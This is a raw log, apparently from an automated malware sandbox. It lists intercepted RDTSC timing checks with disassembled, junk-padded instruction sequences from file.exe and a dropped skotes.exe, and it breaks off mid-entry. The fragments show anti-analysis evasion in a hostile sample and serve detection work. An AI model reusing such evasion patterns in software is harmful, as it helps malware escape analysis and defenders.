Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53608D1 second address: 5360903 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D19596921h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6D19596928h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360903 second address: 5360912 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D18BC6CBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360912 second address: 5360918 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360918 second address: 536091C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 536091C second address: 536095F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F6D1959691Eh 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F6D19596920h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F6D19596927h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 536095F second address: 5360977 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6D18BC6CC4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360977 second address: 536097B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 536097B second address: 536098C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and esp, FFFFFFF8h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 536098C second address: 5360990 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360990 second address: 5360996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360996 second address: 536099C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 536099C second address: 53609A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53609A0 second address: 53609B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov edx, 01BAD886h 0x00000011 push edx 0x00000012 pop eax 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53609B4 second address: 53609FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D18BC6CC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c jmp 00007F6D18BC6CC0h 0x00000011 xchg eax, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F6D18BC6CC7h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53609FD second address: 5360A56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D19596929h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F6D19596921h 0x0000000f xchg eax, esi 0x00000010 jmp 00007F6D1959691Eh 0x00000015 mov esi, dword ptr [ebp+08h] 0x00000018 jmp 00007F6D19596920h 0x0000001d sub ebx, ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360A56 second address: 5360A5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360A5A second address: 5360A60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360A60 second address: 5360A66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360A66 second address: 5360A6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360A6A second address: 5360A8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6D18BC6CC5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360A8D second address: 5360A93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360A93 second address: 5360AB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 98D9h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F6D8A78C5A7h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F6D18BC6CBEh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360AB3 second address: 5360AE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6D1959691Ch 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000012 jmp 00007F6D19596920h 0x00000017 mov ecx, esi 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c mov edx, 768BDD5Eh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360AE6 second address: 5360B2D instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6D18BC6CBFh 0x00000008 sub al, 0000000Eh 0x0000000b jmp 00007F6D18BC6CC9h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 je 00007F6D8A78C541h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F6D18BC6CBDh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360B2D second address: 5360B3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6D1959691Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360B3D second address: 5360B95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [76FB6968h], 00000002h 0x0000000f pushad 0x00000010 mov ch, bh 0x00000012 mov edi, esi 0x00000014 popad 0x00000015 jne 00007F6D8A78C51Ah 0x0000001b jmp 00007F6D18BC6CC0h 0x00000020 mov edx, dword ptr [ebp+0Ch] 0x00000023 jmp 00007F6D18BC6CC0h 0x00000028 xchg eax, ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F6D18BC6CC7h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360B95 second address: 5360BBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 mov ch, dl 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6D19596928h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360BBB second address: 5360BE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D18BC6CBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F6D18BC6CC6h 0x0000000f xchg eax, ebx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360BE7 second address: 5360C46 instructions: 0x00000000 rdtsc 0x00000002 mov ch, 8Ah 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F6D19596925h 0x0000000c or ch, FFFFFF86h 0x0000000f jmp 00007F6D19596921h 0x00000014 popfd 0x00000015 popad 0x00000016 push eax 0x00000017 jmp 00007F6D19596921h 0x0000001c xchg eax, ebx 0x0000001d jmp 00007F6D1959691Eh 0x00000022 push dword ptr [ebp+14h] 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 mov edx, 2EFE4E70h 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360CBF second address: 5360CFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D18BC6CC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a jmp 00007F6D18BC6CBEh 0x0000000f pop ebx 0x00000010 jmp 00007F6D18BC6CC0h 0x00000015 mov esp, ebp 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a mov edi, eax 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360CFB second address: 5360D0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movzx esi, dx 0x00000009 popad 0x0000000a pop ebp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5370E3C second address: 5370E4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov ax, bx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5370E4B second address: 5370E50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5370E50 second address: 5370E56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5370E56 second address: 5370E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5370E5A second address: 5370E75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D18BC6CBCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov bl, C8h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5370E75 second address: 5370E7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53F00DC second address: 53F00E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53F00E0 second address: 53F00E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53F00E6 second address: 53F00EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53F00EC second address: 53F0115 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov ebx, esi 0x0000000c pushad 0x0000000d jmp 00007F6D19596920h 0x00000012 mov di, si 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53F0115 second address: 53F0119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53F0119 second address: 53F011F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53F011F second address: 53F0157 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F6D18BC6CC1h 0x00000008 pop ecx 0x00000009 mov di, 24A4h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ebp 0x00000011 jmp 00007F6D18BC6CC3h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53F0157 second address: 53F015B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53F015B second address: 53F0176 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D18BC6CC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0422 second address: 53E0431 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D1959691Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0431 second address: 53E0458 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D18BC6CC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov eax, ebx 0x00000010 mov esi, edx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0458 second address: 53E048B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F6D19596920h 0x00000013 xor esi, 58E38D58h 0x00000019 jmp 00007F6D1959691Bh 0x0000001e popfd 0x0000001f push ecx 0x00000020 pop edi 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E048B second address: 53E0491 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0491 second address: 53E0495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E027F second address: 53E0283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0283 second address: 53E0289 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380170 second address: 538018B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6D18BC6CC7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 538018B second address: 53801F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D19596929h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F6D1959691Eh 0x00000011 push eax 0x00000012 pushad 0x00000013 mov bx, 93C4h 0x00000017 movsx ebx, cx 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c jmp 00007F6D19596924h 0x00000021 mov ebp, esp 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F6D19596927h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53801F3 second address: 538020B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6D18BC6CC4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E06B2 second address: 53E06B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E06B8 second address: 53E06BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E06BC second address: 53E06CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E06CB second address: 53E06DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D18BC6CBFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E06DE second address: 53E07BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, cx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b call 00007F6D1959691Ah 0x00000010 pushfd 0x00000011 jmp 00007F6D19596922h 0x00000016 adc cl, FFFFFF88h 0x00000019 jmp 00007F6D1959691Bh 0x0000001e popfd 0x0000001f pop ecx 0x00000020 push ebx 0x00000021 pushfd 0x00000022 jmp 00007F6D19596924h 0x00000027 jmp 00007F6D19596925h 0x0000002c popfd 0x0000002d pop esi 0x0000002e popad 0x0000002f mov ebp, esp 0x00000031 pushad 0x00000032 push edi 0x00000033 push ecx 0x00000034 pop edx 0x00000035 pop ecx 0x00000036 jmp 00007F6D19596925h 0x0000003b popad 0x0000003c push dword ptr [ebp+0Ch] 0x0000003f jmp 00007F6D1959691Eh 0x00000044 push dword ptr [ebp+08h] 0x00000047 jmp 00007F6D19596920h 0x0000004c push 1E76AFB9h 0x00000051 jmp 00007F6D19596921h 0x00000056 xor dword ptr [esp], 1E77AFBBh 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007F6D19596928h 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E07BE second address: 53E07CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D18BC6CBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E07CD second address: 53E07E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6D1959691Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E083C second address: 53E0842 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0842 second address: 53E0846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: CC668A second address: CC669D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6D18BC6CBAh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: CC669D second address: CC66A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: CC66A1 second address: CC66BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F6D18BC6CBCh 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: CC66BA second address: CC66BF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: CD155F second address: CD159E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F6D18BC6CB6h 0x0000000a popad 0x0000000b jbe 00007F6D18BC6CC2h 0x00000011 jmp 00007F6D18BC6CC1h 0x00000016 popad 0x00000017 pushad 0x00000018 jbe 00007F6D18BC6CBCh 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: CD187B second address: CD1885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: CD1C97 second address: CD1C9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: CD1C9D second address: CD1CA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: CD502B second address: CD502F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: CD50EE second address: CD50F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: CD50F4 second address: CD511C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F6D18BC6CC7h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: CD511C second address: CD51C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 jns 00007F6D1959692Dh 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 jmp 00007F6D19596928h 0x00000017 pop eax 0x00000018 mov dword ptr [ebp+122D1C7Ch], edi 0x0000001e push 00000003h 0x00000020 pushad 0x00000021 add edi, 7D1A77E7h 0x00000027 mov si, ax 0x0000002a popad 0x0000002b push 00000000h 0x0000002d mov edi, 540D7F06h 0x00000032 push 00000003h 0x00000034 push 00000000h 0x00000036 push ecx 0x00000037 call 00007F6D19596918h 0x0000003c pop ecx 0x0000003d mov dword ptr [esp+04h], ecx 0x00000041 add dword ptr [esp+04h], 0000001Dh 0x00000049 inc ecx 0x0000004a push ecx 0x0000004b ret 0x0000004c pop ecx 0x0000004d ret 0x0000004e adc di, 2500h 0x00000053 add dword ptr [ebp+122D1FE3h], esi 0x00000059 call 00007F6D19596919h 0x0000005e jmp 00007F6D1959691Dh 0x00000063 push eax 0x00000064 pushad 0x00000065 push eax 0x00000066 push edx 0x00000067 push edx 0x00000068 pop edx 0x00000069 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: CD51C6 second address: CD51D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F6D18BC6CB6h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: CD51D4 second address: CD520C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push ebx 0x0000000c jnc 00007F6D1959691Ch 0x00000012 pop ebx 0x00000013 mov eax, dword ptr [eax] 0x00000015 jmp 00007F6D1959691Fh 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push esi 0x0000001f pushad 0x00000020 jno 00007F6D19596916h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: CD520C second address: CD5291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pop eax 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007F6D18BC6CB8h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 00000014h 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 call 00007F6D18BC6CC9h 0x00000026 call 00007F6D18BC6CC2h 0x0000002b or dword ptr [ebp+122D26E6h], ebx 0x00000031 pop edx 0x00000032 pop ecx 0x00000033 lea ebx, dword ptr [ebp+12459F4Bh] 0x00000039 push edi 0x0000003a sub edi, dword ptr [ebp+122D2BB6h] 0x00000040 pop ecx 0x00000041 mov dword ptr [ebp+122D3931h], edx 0x00000047 xchg eax, ebx 0x00000048 jmp 